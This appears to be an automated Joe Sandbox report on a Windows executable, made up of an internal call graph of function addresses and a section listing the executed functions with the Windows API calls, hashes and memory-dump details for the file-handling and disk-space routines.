40229->40227 40233 43add9 40229->40233 40232 43ae3a memset 40234 43ae73 40232->40234 40233->40233 40396 423426 11 API calls 40233->40396 40397 42e1c0 147 API calls 40234->40397 40235 43adab 40394 438c4e 163 API calls 40235->40394 40238 43ad6c 40238->40198 40238->40235 40393 42370b memset memcpy memset 40238->40393 40240 43adcc 40395 440f84 12 API calls 40240->40395 40241 43ae96 40398 42e1c0 147 API calls 40241->40398 40244 43aea8 40245 43aec1 40244->40245 40399 42e199 147 API calls 40244->40399 40246 43af00 40245->40246 40400 42e1c0 147 API calls 40245->40400 40246->40198 40250 43af1a 40246->40250 40251 43b3d9 40246->40251 40401 438eed 16 API calls 40250->40401 40256 43b3f6 40251->40256 40260 43b4c8 40251->40260 40253 43b60f 40253->40198 40460 4393a5 17 API calls 40253->40460 40255 43af2f 40402 4233c5 16 API calls 40255->40402 40442 432878 12 API calls 40256->40442 40258 43af51 40403 423426 11 API calls 40258->40403 40268 43b4f2 40260->40268 40448 42bbd5 memcpy memcpy memcpy memset memcpy 40260->40448 40262 43af7d 40404 423426 11 API calls 40262->40404 40266 43b529 40450 44081d 163 API calls 40266->40450 40267 43af94 40405 423330 11 API calls 40267->40405 40449 43a76c 21 API calls 40268->40449 40272 43afca 40406 423330 11 API calls 40272->40406 40273 43b47e 40276 43b497 40273->40276 40445 42374a memcpy memset memcpy memcpy memcpy 40273->40445 40274 43b544 40277 43b55c 40274->40277 40451 42c02e memset 40274->40451 40446 4233ae 11 API calls 40276->40446 40452 43a87a 163 API calls 40277->40452 40278 43afdb 40407 4233ae 11 API calls 40278->40407 40283 43b428 40294 43b462 40283->40294 40443 432b60 16 API calls 40283->40443 40285 43b56c 40288 43b58a 40285->40288 40453 423330 11 API calls 40285->40453 40286 43b4b1 40447 423399 11 API calls 40286->40447 40287 43afee 40408 44081d 163 API calls 40287->40408 40454 440f84 12 API calls 40288->40454 40290 43b4c1 40456 42db80 163 API calls 40290->40456 40444 423330 11 API calls 40294->40444 40296 43b592 40455 43a82f 16 API calls 40296->40455 40299 43b5b4 40457 438c4e 163 API calls 40299->40457 40301 43b5cf 40458 42c02e memset 40301->40458 40303 43b005 40303->40198 40307 43b01f 40303->40307 40409 42d836 163 API calls 40303->40409 40304 43b1ef 40419 4233c5 16 API calls 40304->40419 40307->40304 40417 423330 11 API calls 40307->40417 40418 42d71d 163 API calls 40307->40418 40308 43b212 40420 423330 11 API calls 40308->40420 40309 43b087 40410 4233ae 11 API calls 40309->40410 40310 43add4 40310->40253 40459 438f86 16 API calls 40310->40459 40314 43b22a 40421 42ccb5 11 API calls 40314->40421 40317 43b23f 40422 4233ae 11 API calls 40317->40422 40318 43b10f 40413 423330 11 API calls 40318->40413 40320 43b257 40423 4233ae 11 API calls 40320->40423 40324 43b129 40414 4233ae 11 API calls 40324->40414 40325 43b26e 40424 4233ae 11 API calls 40325->40424 40328 43b09a 40328->40318 40411 42cc15 19 API calls 40328->40411 40412 4233ae 11 API calls 40328->40412 40329 43b282 40425 43a87a 163 API calls 40329->40425 40331 43b13c 40415 440f84 12 API calls 40331->40415 40333 43b29d 40426 423330 11 API calls 40333->40426 40336 43b15f 40416 4233ae 11 API calls 40336->40416 40337 43b2af 40339 43b2b8 40337->40339 40340 43b2ce 40337->40340 40427 4233ae 11 API calls 40339->40427 40428 440f84 12 API calls 40340->40428 40343 43b2c9 40430 4233ae 11 API calls 40343->40430 40344 43b2da 40429 42370b memset memcpy memset 40344->40429 40347 43b2f9 40431 423330 11 API calls 40347->40431 40349 43b30b 40432 423330 11 API calls 40349->40432 40351 43b325 40433 423399 11 API calls 40351->40433 40353 43b332 40434 4233ae 11 API calls 40353->40434 40355 43b354 40435 423399 11 API calls 40355->40435 40357 43b364 40436 43a82f 16 API calls 40357->40436 40359 43b370 40437 42db80 163 API calls 40359->40437 40361 43b380 40438 438c4e 163 API calls 40361->40438 40363 43b39e 40439 423399 11 API calls 40363->40439 40365 43b3ae 40440 43a76c 21 API calls 40365->40440 40367 43b3c3 40441 423399 11 API calls 40367->40441 40369->40190 40370->40193 40371->40191 40373 43a6f5 40372->40373 40379 43a765 40372->40379 40373->40379 40461 42a115 40373->40461 40377 43a73d 40378 42a115 147 API calls 40377->40378 40377->40379 40378->40379 40379->40198 40381 4397fd memset 40379->40381 40380->40200 40381->40207 40382->40198 40383->40222 40384->40211 40385->40216 40386->40212 40387->40215 40388->40220 40389->40224 40390->40226 40391->40229 40392->40238 40393->40235 40394->40240 40395->40310 40396->40232 40397->40241 40398->40244 40399->40245 40400->40245 40401->40255 40402->40258 40403->40262 40404->40267 40405->40272 40406->40278 40407->40287 40408->40303 40409->40309 40410->40328 40411->40328 40412->40328 40413->40324 40414->40331 40415->40336 40416->40307 40417->40307 40418->40307 40419->40308 40420->40314 40421->40317 40422->40320 40423->40325 40424->40329 40425->40333 40426->40337 40427->40343 40428->40344 40429->40343 40430->40347 40431->40349 40432->40351 40433->40353 40434->40355 40435->40357 40436->40359 40437->40361 40438->40363 40439->40365 40440->40367 40441->40310 40442->40283 40443->40294 40444->40273 40445->40276 40446->40286 40447->40290 40448->40268 40449->40266 40450->40274 40451->40277 40452->40285 40453->40288 40454->40296 40455->40290 40456->40299 40457->40301 40458->40310 40459->40253 40460->40198 40462 42a175 40461->40462 40464 42a122 40461->40464 40462->40379 40467 42b13b 147 API calls 40462->40467 40464->40462 40465 42a115 147 API calls 40464->40465 40468 43a174 40464->40468 40492 42a0a8 147 API calls 40464->40492 40465->40464 40467->40377 40482 43a196 40468->40482 40483 43a19e 40468->40483 40469 43a306 40469->40482 40505 4388c4 14 API calls 40469->40505 40472 42a115 147 API calls 40472->40483 40473 415a91 memset 40473->40483 40474 43a642 40474->40482 40509 4169a7 11 API calls 40474->40509 40476 4165ff 11 API calls 40476->40483 40478 43a635 40508 42c02e memset 40478->40508 40482->40464 40483->40469 40483->40472 40483->40473 40483->40476 40483->40482 40493 42ff8c 40483->40493 40501 439504 13 API calls 40483->40501 40502 4312d0 147 API calls 40483->40502 40503 42be4c memcpy memcpy memcpy memset memcpy 40483->40503 40504 43a121 11 API calls 40483->40504 40485 4169a7 11 API calls 40486 43a325 40485->40486 40486->40474 40486->40478 40486->40482 40486->40485 40487 42b5b5 memset memcpy 40486->40487 40488 42bf4c 14 API calls 40486->40488 40491 4165ff 11 API calls 40486->40491 40506 42b63e 14 API calls 40486->40506 40507 42bfcf memcpy 40486->40507 40487->40486 40488->40486 40491->40486 40492->40464 40494 43817e 139 API calls 40493->40494 40495 42ff99 40494->40495 40496 42ffe3 40495->40496 40497 42ffd0 40495->40497 40500 42ff9d 40495->40500 40511 4169a7 11 API calls 40496->40511 40510 4169a7 11 API calls 40497->40510 40500->40483 40501->40483 40502->40483 40503->40483 40504->40483 40505->40486 40506->40486 40507->40486 40508->40474 40509->40482 40510->40500 40511->40500 40533 41493c EnumResourceNamesW 37541 4287c1 37542 4287d2 37541->37542 37543 429ac1 37541->37543 37544 428818 37542->37544 37545 42881f 37542->37545 37559 425711 37542->37559 37558 425ad6 37543->37558 37611 415c56 11 API calls 37543->37611 37578 42013a 37544->37578 37606 420244 97 API calls 37545->37606 37550 4260dd 37605 424251 120 API calls 37550->37605 37552 4259da 37604 416760 11 API calls 37552->37604 37557 429a4d 37561 429a66 37557->37561 37562 429a9b 37557->37562 37559->37543 37559->37552 37559->37557 37560 422aeb memset memcpy memcpy 37559->37560 37564 4260a1 37559->37564 37574 4259c2 37559->37574 37577 425a38 37559->37577 37594 4227f0 memset memcpy 37559->37594 37595 422b84 15 API calls 37559->37595 37596 422b5d memset memcpy memcpy 37559->37596 37597 422640 13 API calls 37559->37597 37599 4241fc 11 API calls 37559->37599 37600 42413a 90 API calls 37559->37600 37560->37559 37607 415c56 11 API calls 37561->37607 37566 429a96 37562->37566 37609 416760 11 API calls 37562->37609 37603 415c56 11 API calls 37564->37603 37610 424251 120 API calls 37566->37610 37569 429a7a 37608 416760 11 API calls 37569->37608 37574->37558 37598 415c56 11 API calls 37574->37598 37577->37574 37601 422640 13 API calls 37577->37601 37602 4226e0 12 API calls 37577->37602 37579 42014c 37578->37579 37582 420151 37578->37582 37621 41e466 97 API calls 37579->37621 37581 420162 37581->37559 37582->37581 37583 4201b3 37582->37583 37584 420229 37582->37584 37585 4201b8 37583->37585 37586 4201dc 37583->37586 37584->37581 37587 41fd5e 86 API calls 37584->37587 37612 41fbdb 37585->37612 37586->37581 37590 4201ff 37586->37590 37618 41fc4c 37586->37618 37587->37581 37590->37581 37593 42013a 97 API calls 37590->37593 37593->37581 37594->37559 37595->37559 37596->37559 37597->37559 37598->37552 37599->37559 37600->37559 37601->37577 37602->37577 37603->37552 37604->37550 37605->37558 37606->37559 37607->37569 37608->37566 37609->37566 37610->37543 37611->37552 37613 41fbf8 37612->37613 37616 41fbf1 37612->37616 37626 41ee26 37613->37626 37617 41fc39 37616->37617 37636 4446ce 11 API calls 37616->37636 37617->37581 37622 41fd5e 37617->37622 37619 41ee6b 86 API calls 37618->37619 37620 41fc5d 37619->37620 37620->37586 37621->37582 37624 41fd65 37622->37624 37623 41fdab 37623->37581 37624->37623 37625 41fbdb 86 API calls 37624->37625 37625->37624 37627 41ee41 37626->37627 37628 41ee32 37626->37628 37637 41edad 37627->37637 37640 4446ce 11 API calls 37628->37640 37631 41ee3c 37631->37616 37634 41ee58 37634->37631 37642 41ee6b 37634->37642 37636->37617 37646 41be52 37637->37646 37640->37631 37641 41eb85 11 API calls 37641->37634 37643 41ee70 37642->37643 37644 41ee78 37642->37644 37702 41bf99 86 API calls 37643->37702 37644->37631 37647 41be6f 37646->37647 37648 41be5f 37646->37648 37653 41be8c 37647->37653 37667 418c63 37647->37667 37681 4446ce 11 API calls 37648->37681 37650 41be69 37650->37631 37650->37641 37653->37650 37654 41bf3a 37653->37654 37655 41bed1 37653->37655 37658 41bee7 37653->37658 37684 4446ce 11 API calls 37654->37684 37657 41bef0 37655->37657 37661 41bee2 37655->37661 37657->37658 37659 41bf01 37657->37659 37658->37650 37685 41a453 86 API calls 37658->37685 37660 41bf24 memset 37659->37660 37665 41bf14 37659->37665 37682 418a6d memset memcpy memset 37659->37682 37660->37650 37671 41ac13 37661->37671 37683 41a223 memset memcpy memset 37665->37683 37666 41bf20 37666->37660 37670 418c72 37667->37670 37668 418c94 37668->37653 37669 418d51 memset memset 37669->37668 37670->37668 37670->37669 37672 41ac52 37671->37672 37673 41ac3f memset 37671->37673 37675 41ac6a 37672->37675 37686 41dc14 19 API calls 37672->37686 37678 41acd9 37673->37678 37677 41aca1 37675->37677 37687 41519d 37675->37687 37677->37678 37679 41acc0 memset 37677->37679 37680 41accd memcpy 37677->37680 37678->37658 37679->37678 37680->37678 37681->37650 37682->37665 37683->37666 37684->37658 37686->37675 37690 4175ed 37687->37690 37698 417570 SetFilePointer 37690->37698 37693 41760a ReadFile 37694 417637 37693->37694 37695 417627 GetLastError 37693->37695 37696 41763e memset 37694->37696 37697 4151b3 37694->37697 37695->37697 37696->37697 37697->37677 37699 4175b2 37698->37699 37700 41759c GetLastError 37698->37700 37699->37693 37699->37697 37700->37699 37701 4175a8 GetLastError 37700->37701 37701->37699 37702->37644 37703 417bc5 37704 417c61 37703->37704 37705 417bda 37703->37705 37705->37704 37706 417bf6 UnmapViewOfFile CloseHandle 37705->37706 37708 417c2c 37705->37708 37710 4175b7 37705->37710 37706->37705 37706->37706 37708->37705 37715 41851e 20 API calls 37708->37715 37711 4175d6 CloseHandle 37710->37711 37712 4175c8 37711->37712 37713 4175df 37711->37713 37712->37713 37714 4175ce Sleep 37712->37714 37713->37705 37714->37711 37715->37708 37722 4415ea 37730 4304b2 37722->37730 37724 4415fe 37725 4418ea 37724->37725 37726 442bd4 37724->37726 37727 4418e2 37724->37727 37726->37725 37778 441409 memset 37726->37778 37727->37725 37777 4414a9 12 API calls 37727->37777 37779 43041c 12 API calls 37730->37779 37732 4304cd 37737 430557 37732->37737 37780 43034a memcpy 37732->37780 37734 4304f3 37734->37737 37781 430468 11 API calls 37734->37781 37736 430506 37736->37737 37738 43057b 37736->37738 37782 43817e 37736->37782 37737->37724 37787 415a91 37738->37787 37743 4305e4 37743->37737 37792 4328e4 12 API calls 37743->37792 37745 43052d 37745->37737 37745->37738 37748 430542 37745->37748 37747 4305fa 37749 430609 37747->37749 37793 423383 11 API calls 37747->37793 37748->37737 37786 4169a7 11 API calls 37748->37786 37794 423330 11 API calls 37749->37794 37752 430634 37795 423399 11 API calls 37752->37795 37754 430648 37796 4233ae 11 API calls 37754->37796 37756 43066b 37797 423330 11 API calls 37756->37797 37758 43067d 37798 4233ae 11 API calls 37758->37798 37760 430695 37799 423330 11 API calls 37760->37799 37762 4306d6 37801 423330 11 API calls 37762->37801 37763 4306a7 37763->37762 37764 4306c0 37763->37764 37800 4233ae 11 API calls 37764->37800 37767 4306d1 37802 430369 17 API calls 37767->37802 37769 4306f3 37803 423330 11 API calls 37769->37803 37771 430704 37804 423330 11 API calls 37771->37804 37773 430710 37805 423330 11 API calls 37773->37805 37775 43071e 37806 423383 11 API calls 37775->37806 37777->37725 37778->37726 37779->37732 37780->37734 37781->37736 37783 438187 37782->37783 37785 438192 37782->37785 37807 4380f6 37783->37807 37785->37745 37786->37737 37788 415a9d 37787->37788 37789 415ab3 37788->37789 37790 415aa4 memset 37788->37790 37789->37737 37791 4397fd memset 37789->37791 37790->37789 37791->37743 37792->37747 37793->37749 37794->37752 37795->37754 37796->37756 37797->37758 37798->37760 37799->37763 37800->37767 37801->37767 37802->37769 37803->37771 37804->37773 37805->37775 37806->37737 37809 43811f 37807->37809 37808 438164 37808->37785 37809->37808 37812 437e5e 37809->37812 37835 4300e8 memset memset memcpy 37809->37835 37836 437d3c 37812->37836 37814 437eb3 37814->37809 37815 437ea9 37815->37814 37820 437f22 37815->37820 37851 41f432 37815->37851 37818 437f06 37901 415c56 11 API calls 37818->37901 37823 437f7f 37820->37823 37902 432d4e 37820->37902 37821 437f95 37906 415c56 11 API calls 37821->37906 37823->37821 37824 43802b 37823->37824 37862 4165ff 37824->37862 37826 437fa3 37826->37814 37909 41f638 104 API calls 37826->37909 37831 43806b 37832 438094 37831->37832 37907 42f50e 138 API calls 37831->37907 37832->37826 37908 4300e8 memset memset memcpy 37832->37908 37835->37809 37837 437d69 37836->37837 37840 437d80 37836->37840 37922 437ccb 11 API calls 37837->37922 37839 437d76 37839->37815 37840->37839 37841 437da3 37840->37841 37843 437d90 37840->37843 37910 438460 37841->37910 37843->37839 37926 437ccb 11 API calls 37843->37926 37845 437de8 37925 424f26 123 API calls 37845->37925 37847 437dcb 37847->37845 37923 444283 13 API calls 37847->37923 37849 437dfc 37924 437ccb 11 API calls 37849->37924 37852 41f54d 37851->37852 37856 41f44f 37851->37856 37853 41f466 37852->37853 38097 41c635 memset memset 37852->38097 37853->37818 37853->37820 37856->37853 37860 41f50b 37856->37860 38068 41f1a5 37856->38068 38093 41c06f memcmp 37856->38093 38094 41f3b1 90 API calls 37856->38094 38095 41f398 86 API calls 37856->38095 37860->37852 37860->37853 38096 41c295 86 API calls 37860->38096 37863 4165a0 11 API calls 37862->37863 37864 41660d 37863->37864 37865 437371 37864->37865 37866 41703f 11 API calls 37865->37866 37867 437399 37866->37867 37868 43739d 37867->37868 37870 4373ac 37867->37870 38202 4446ea 11 API calls 37868->38202 37871 416935 16 API calls 37870->37871 37887 4373ca 37871->37887 37872 437584 37874 4375bc 37872->37874 38209 42453e 123 API calls 37872->38209 37873 438460 134 API calls 37873->37887 37876 415c7d 16 API calls 37874->37876 37877 4375d2 37876->37877 37881 4373a7 37877->37881 38210 4442e6 37877->38210 37880 4375e2 37880->37881 38217 444283 13 API calls 37880->38217 37881->37831 37883 415a91 memset 37883->37887 37886 43758f 38208 42453e 123 API calls 37886->38208 37887->37872 37887->37873 37887->37883 37887->37886 37900 437d3c 135 API calls 37887->37900 38184 4251c4 37887->38184 38203 425433 13 API calls 37887->38203 38204 425413 17 API calls 37887->38204 38205 42533e 16 API calls 37887->38205 38206 42538f 16 API calls 37887->38206 38207 42453e 123 API calls 37887->38207 37890 4375f4 37894 437620 37890->37894 37895 43760b 37890->37895 37892 43759f 37893 416935 16 API calls 37892->37893 37893->37872 37896 416935 16 API calls 37894->37896 38218 444283 13 API calls 37895->38218 37896->37881 37899 437612 memcpy 37899->37881 37900->37887 37901->37814 37903 432d58 37902->37903 37905 432d65 37902->37905 38293 432cc4 memset memset memcpy 37903->38293 37905->37823 37906->37826 37907->37832 37908->37826 37909->37814 37927 41703f 37910->37927 37912 43847a 37913 43848a 37912->37913 37914 43847e 37912->37914 37934 438270 37913->37934 37964 4446ea 11 API calls 37914->37964 37918 438488 37918->37847 37920 4384bb 37921 438270 134 API calls 37920->37921 37921->37918 37922->37839 37923->37849 37924->37845 37925->37839 37926->37839 37928 417044 37927->37928 37929 41705c 37927->37929 37933 417055 37928->37933 37966 416760 11 API calls 37928->37966 37930 417075 37929->37930 37967 41707a 11 API calls 37929->37967 37930->37912 37933->37912 37935 415a91 memset 37934->37935 37936 43828d 37935->37936 37937 438297 37936->37937 37938 438341 37936->37938 37940 4382d6 37936->37940 37939 415c7d 16 API calls 37937->37939 37968 44358f 37938->37968 37942 438458 37939->37942 37943 4382fb 37940->37943 37944 4382db 37940->37944 37942->37918 37965 424f26 123 API calls 37942->37965 38011 415c23 memcpy 37943->38011 37999 416935 37944->37999 37947 438305 37951 44358f 19 API calls 37947->37951 37953 438318 37947->37953 37948 4382e9 38007 415c7d 37948->38007 37950 438373 37956 438383 37950->37956 38012 4300e8 memset memset memcpy 37950->38012 37951->37953 37953->37950 37994 43819e 37953->37994 37955 4383cd 37957 4383f5 37955->37957 38014 42453e 123 API calls 37955->38014 37956->37955 38013 415c23 memcpy 37956->38013 37960 438404 37957->37960 37961 43841c 37957->37961 37963 416935 16 API calls 37960->37963 37962 416935 16 API calls 37961->37962 37962->37937 37963->37937 37964->37918 37965->37920 37966->37933 37967->37928 37969 4435be 37968->37969 37970 44360c 37969->37970 37972 443676 37969->37972 37975 4436ce 37969->37975 37979 44366c 37969->37979 38015 442ff8 37969->38015 37970->37953 37971 443758 37984 443775 37971->37984 38024 441409 memset 37971->38024 37972->37971 37974 443737 37972->37974 37976 442ff8 19 API calls 37972->37976 37977 442ff8 19 API calls 37974->37977 37981 4165ff 11 API calls 37975->37981 37976->37974 37977->37971 38023 4169a7 11 API calls 37979->38023 37980 4437be 37985 4437de 37980->37985 38026 416760 11 API calls 37980->38026 37981->37972 37984->37980 38025 415c56 11 API calls 37984->38025 37988 443801 37985->37988 38027 42463b memset memcpy 37985->38027 37987 443826 38029 43bd08 memset 37987->38029 37988->37987 38028 43024d memset 37988->38028 37992 443837 37992->37970 38030 43024d memset 37992->38030 37995 438246 37994->37995 37997 4381ba 37994->37997 37995->37950 37996 41f432 110 API calls 37996->37997 37997->37995 37997->37996 38046 41f638 104 API calls 37997->38046 38000 41693e 37999->38000 38003 41698e 37999->38003 38001 41694c 38000->38001 38047 422fd1 memset 38000->38047 38001->38003 38048 4165a0 38001->38048 38003->37948 38008 415c81 38007->38008 38009 415c9c 38007->38009 38008->38009 38010 416935 16 API calls 38008->38010 38009->37937 38010->38009 38011->37947 38012->37956 38013->37955 38014->37957 38016 442ffe 38015->38016 38017 443094 38016->38017 38021 443092 38016->38021 38031 4414ff 38016->38031 38043 4169a7 11 API calls 38016->38043 38044 441325 memset 38016->38044 38045 4414a9 12 API calls 38017->38045 38021->37969 38023->37972 38024->37971 38025->37980 38026->37985 38027->37988 38028->37987 38029->37992 38030->37992 38032 441539 38031->38032 38033 441547 38031->38033 38032->38033 38034 441575 38032->38034 38035 441582 38032->38035 38036 4418e2 38033->38036 38042 442bd4 38033->38042 38038 42fccf 18 API calls 38034->38038 38037 43275a 12 API calls 38035->38037 38039 4414a9 12 API calls 38036->38039 38040 4418ea 38036->38040 38037->38033 38038->38033 38039->38040 38040->38016 38041 441409 memset 38041->38042 38042->38040 38042->38041 38043->38016 38044->38016 38045->38021 38046->37997 38047->38001 38054 415cfe 38048->38054 38053 422b84 15 API calls 38053->38003 38055 41628e 38054->38055 38060 415d23 __aullrem __aulldvrm 38054->38060 38062 416520 38055->38062 38056 4163ca 38057 416422 10 API calls 38056->38057 38057->38055 38058 416422 10 API calls 38058->38060 38059 416172 memset 38059->38060 38060->38055 38060->38056 38060->38058 38060->38059 38061 415cb9 10 API calls 38060->38061 38061->38060 38063 416527 38062->38063 38067 416574 38062->38067 38064 415700 10 API calls 38063->38064 38065 416544 38063->38065 38063->38067 38064->38065 38066 416561 memcpy 38065->38066 38065->38067 38066->38067 38067->38003 38067->38053 38098 41bc3b 38068->38098 38071 41edad 86 API calls 38072 41f1cb 38071->38072 38073 41f1f5 memcmp 38072->38073 38074 41f20e 38072->38074 38078 41f282 38072->38078 38073->38074 38075 41f21b memcmp 38074->38075 38074->38078 38076 41f326 38075->38076 38079 41f23d 38075->38079 38077 41ee6b 86 API calls 38076->38077 38076->38078 38077->38078 38078->37856 38079->38076 38080 41f28e memcmp 38079->38080 38122 41c8df 56 API calls 38079->38122 38080->38076 38081 41f2a9 38080->38081 38081->38076 38084 41f308 38081->38084 38085 41f2d8 38081->38085 38083 41f269 38083->38076 38086 41f287 38083->38086 38087 41f27a 38083->38087 38084->38076 38124 4446ce 11 API calls 38084->38124 38088 41ee6b 86 API calls 38085->38088 38086->38080 38089 41ee6b 86 API calls 38087->38089 38090 41f2e0 38088->38090 38089->38078 38123 41b1ca memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 38090->38123 38093->37856 38094->37856 38095->37856 38096->37852 38097->37853 38100 41bc54 38098->38100 38107 41be0b 38098->38107 38103 41bd61 38100->38103 38100->38107 38115 41bc8d 38100->38115 38125 41baf0 55 API calls 38100->38125 38102 41be45 38102->38071 38102->38078 38103->38102 38134 41a25f memset 38103->38134 38105 41be04 38132 41aee4 56 API calls 38105->38132 38107->38103 38133 41ae17 34 API calls 38107->38133 38108 41bd42 38108->38103 38108->38105 38109 41bdd8 memset 38108->38109 38110 41bdba 38108->38110 38111 41bde7 memcmp 38109->38111 38121 4175ed 6 API calls 38110->38121 38111->38105 38114 41bdfd 38111->38114 38112 41bd18 38112->38103 38112->38108 38130 41a9da 86 API calls __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 38112->38130 38113 41bdcc 38113->38103 38113->38111 38131 41a1b0 memset 38114->38131 38115->38103 38115->38108 38115->38112 38126 4151e3 38115->38126 38121->38113 38122->38083 38123->38078 38124->38076 38125->38115 38135 41837f 38126->38135 38129 444706 11 API calls 38129->38112 38130->38108 38131->38105 38132->38107 38133->38103 38134->38102 38136 4183c1 38135->38136 38139 4183ca 38135->38139 38182 418197 25 API calls 38136->38182 38140 4151f9 38139->38140 38156 418160 38139->38156 38140->38112 38140->38129 38141 4183e5 38141->38140 38165 41739b 38141->38165 38144 418444 CreateFileW 38146 418477 38144->38146 38145 41845f CreateFileA 38145->38146 38147 4184c2 memset 38146->38147 38148 41847e GetLastError free 38146->38148 38168 418758 38147->38168 38149 4184b5 38148->38149 38150 418497 38148->38150 38183 444706 11 API calls 38149->38183 38152 41837f 49 API calls 38150->38152 38152->38140 38157 41739b GetVersionExW 38156->38157 38158 418165 38157->38158 38160 4173e4 MultiByteToWideChar malloc MultiByteToWideChar free 38158->38160 38161 418178 38160->38161 38162 41817f 38161->38162 38163 41748f AreFileApisANSI WideCharToMultiByte malloc WideCharToMultiByte free 38161->38163 38162->38141 38164 418188 free 38163->38164 38164->38141 38166 4173d6 38165->38166 38167 4173ad GetVersionExW 38165->38167 38166->38144 38166->38145 38167->38166 38169 418680 43 API calls 38168->38169 38170 418782 38169->38170 38171 418160 11 API calls 38170->38171 38173 418506 free 38170->38173 38172 418799 38171->38172 38172->38173 38174 41739b GetVersionExW 38172->38174 38173->38140 38175 4187a7 38174->38175 38176 4187da 38175->38176 38177 4187ad GetDiskFreeSpaceW 38175->38177 38179 4187ec GetDiskFreeSpaceA 38176->38179 38181 4187e8 38176->38181 38180 418800 free 38177->38180 38179->38180 38180->38173 38181->38179 38182->38139 38183->38140 38219 424f07 38184->38219 38186 4251e4 38187 4251f7 38186->38187 38188 4251e8 38186->38188 38227 4250f8 38187->38227 38226 4446ea 11 API calls 38188->38226 38190 4251f2 38190->37887 38192 425209 38195 425249 38192->38195 38198 4250f8 127 API calls 38192->38198 38199 425287 38192->38199 38235 4384e9 135 API calls 38192->38235 38236 424f74 124 API calls 38192->38236 38193 415c7d 16 API calls 38193->38190 38195->38199 38237 424ff0 13 API calls 38195->38237 38198->38192 38199->38193 38200 425266 38200->38199 38238 415be9 memcpy 38200->38238 38202->37881 38203->37887 38204->37887 38205->37887 38206->37887 38207->37887 38208->37892 38209->37874 38211 4442eb 38210->38211 38214 444303 38210->38214 38291 41707a 11 API calls 38211->38291 38213 4442f2 38213->38214 38292 4446ea 11 API calls 38213->38292 38214->37880 38216 444300 38216->37880 38217->37890 38218->37899 38220 424f1f 38219->38220 38221 424f0c 38219->38221 38240 424eea 11 API calls 38220->38240 38239 416760 11 API calls 38221->38239 38224 424f18 38224->38186 38225 424f24 38225->38186 38226->38190 38228 425108 38227->38228 38234 42510d 38227->38234 38273 424f74 124 API calls 38228->38273 38231 42516e 38233 415c7d 16 API calls 38231->38233 38232 425115 38232->38192 38233->38232 38234->38232 38241 42569b 38234->38241 38235->38192 38236->38192 38237->38200 38238->38199 38239->38224 38240->38225 38251 4256f1 38241->38251 38269 4259c2 38241->38269 38246 4260dd 38285 424251 120 API calls 38246->38285 38250 429a4d 38253 429a66 38250->38253 38254 429a9b 38250->38254 38251->38250 38252 422aeb memset memcpy memcpy 38251->38252 38256 4260a1 38251->38256 38265 4259da 38251->38265 38267 429ac1 38251->38267 38251->38269 38272 425a38 38251->38272 38274 4227f0 memset memcpy 38251->38274 38275 422b84 15 API calls 38251->38275 38276 422b5d memset memcpy memcpy 38251->38276 38277 422640 13 API calls 38251->38277 38279 4241fc 11 API calls 38251->38279 38280 42413a 90 API calls 38251->38280 38252->38251 38286 415c56 11 API calls 38253->38286 38258 429a96 38254->38258 38288 416760 11 API calls 38254->38288 38283 415c56 11 API calls 38256->38283 38289 424251 120 API calls 38258->38289 38261 429a7a 38287 416760 11 API calls 38261->38287 38284 416760 11 API calls 38265->38284 38268 425ad6 38267->38268 38290 415c56 11 API calls 38267->38290 38268->38231 38269->38268 38278 415c56 11 API calls 38269->38278 38272->38269 38281 422640 13 API calls 38272->38281 38282 4226e0 12 API calls 38272->38282 38273->38234 38274->38251 38275->38251 38276->38251 38277->38251 38278->38265 38279->38251 38280->38251 38281->38272 38282->38272 38283->38265 38284->38246 38285->38268 38286->38261 38287->38258 38288->38258 38289->38267 38290->38265 38291->38213 38292->38216 38293->37905 40163 4147f3 40166 414561 40163->40166 40165 414813 40167 41456d 40166->40167 40168 41457f GetPrivateProfileIntW 40166->40168 40171 4143f1 memset _itow WritePrivateProfileStringW 40167->40171 40168->40165 40170 41457a 40170->40165 40171->40170

                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                            Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                                                                              • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                                                                              • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                                                                                                                                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                                                            • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                                                                                                                                            • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                                                                                                                                            • free.MSVCRT ref: 00418803
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1355100292-0
                                                                                                                                                                                                                                            • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                                                                                                                                            • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                                                                                                                                                            Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0041898C
                                                                                                                                                                                                                                            • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                                                                                                                                            Memory Dump Source
